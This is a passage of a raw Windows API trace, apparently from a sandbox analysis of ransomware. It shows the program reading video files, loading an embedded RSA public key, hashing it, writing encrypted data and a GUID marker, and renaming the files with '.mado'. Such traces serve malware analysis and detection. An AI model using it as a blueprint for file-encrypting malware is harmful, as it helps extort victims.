lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.725] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0205.725] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xbed2, lpOverlapped=0x0) returned 1 [0205.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.726] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.726] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.727] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.727] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.727] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.727] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.727] GetLastError () returned 0x0 [0205.728] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.728] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.728] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.728] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.728] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbed0) returned 0x3b81690 [0205.728] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b667c8 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe9e8 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66810 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea00 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea30 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.729] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74e80 [0205.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea30 | out: hHeap=0x2c0000) returned 1 [0205.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fea48 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fea30 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6ec98 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6edb0 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec98 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea48 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea30 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.730] GetCurrentThreadId () returned 0x600 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72b80 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69c98 [0205.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321af0 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72e98 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.731] GetCurrentThreadId () returned 0x600 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72c88 [0205.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b72fa0 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea30 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0205.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0205.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0205.733] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xbed2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.733] WriteFile (in: hFile=0x63c, lpBuffer=0x3b72b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b72b80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0205.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b72b80 | out: hHeap=0x2c0000) returned 1 [0205.734] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0205.734] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0205.734] CloseHandle (hObject=0x63c) returned 1 [0205.735] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\s53y8a3aL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\s53y8a3al.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\s53y8a3aL.avi.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\s53y8a3al.avi.mado")) returned 1 [0205.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74e80 | out: hHeap=0x2c0000) returned 1 [0205.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.736] VirtualFree (lpAddress=0x3d10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0205.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b2fd8 | out: hHeap=0x2c0000) returned 1 [0205.737] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78440d10, ftCreationTime.dwHighDateTime=0x1d5e2a3, ftLastAccessTime.dwLowDateTime=0xdfba34a0, ftLastAccessTime.dwHighDateTime=0x1d5dbba, ftLastWriteTime.dwLowDateTime=0xdfba34a0, ftLastWriteTime.dwHighDateTime=0x1d5dbba, nFileSizeHigh=0x0, nFileSizeLow=0x8a0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VcusBvwFBr_p.mp4", cAlternateFileName="VCUSBV~1.MP4")) returned 1 [0205.737] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\VcusBvwFBr_p.mp4") returned=".mp4" [0205.737] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iMNzi0f_lMj\\VcusBvwFBr_p.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\imnzi0f_lmj\\vcusbvwfbr_p.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.738] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=35338) returned 1 [0205.738] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.740] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x89e4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.740] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.742] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8a0a, lpOverlapped=0x0) returned 1 [0205.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.743] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.743] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321af0) returned 1 [0205.744] CryptCreateHash (in: hProv=0x321af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.744] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.744] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.744] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.744] GetLastError () returned 0x0 [0205.744] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.744] CryptReleaseContext (hProv=0x321af0, dwFlags=0x0) returned 1 [0205.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.744] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.744] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.744] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a10) returned 0x3b81690 [0205.745] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66810 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea00 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66858 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea48 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea90 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.745] RtlReAllocateHeap (Heap=0x2c0000, 